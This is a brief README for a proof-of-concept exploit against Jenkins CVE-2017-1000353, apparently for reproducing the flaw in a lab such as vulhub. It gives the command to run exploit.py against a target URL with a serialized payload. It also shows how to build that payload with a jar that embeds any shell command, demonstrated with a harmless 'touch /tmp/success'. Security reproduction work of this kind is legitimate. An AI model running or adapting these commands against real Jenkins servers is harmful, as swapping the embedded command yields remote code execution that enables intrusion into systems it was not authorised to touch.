Awesome

CVE-2017-1000353 POC

How to reproduce the Jenkins CVE-2017-1000353？

Clone this repository, use the pre-built payload jenkins_poc.ser with flowing command:

python exploit.py http://your-ip:8080 jenkins_poc.ser

Then the touch /tmp/success would be executed.

How to generate the payload jenkins_poc.ser？

Download CVE-2017-1000353-SNAPSHOT-all.jar.

java -jar CVE-2017-1000353-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"

Referer:

https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2017-1000353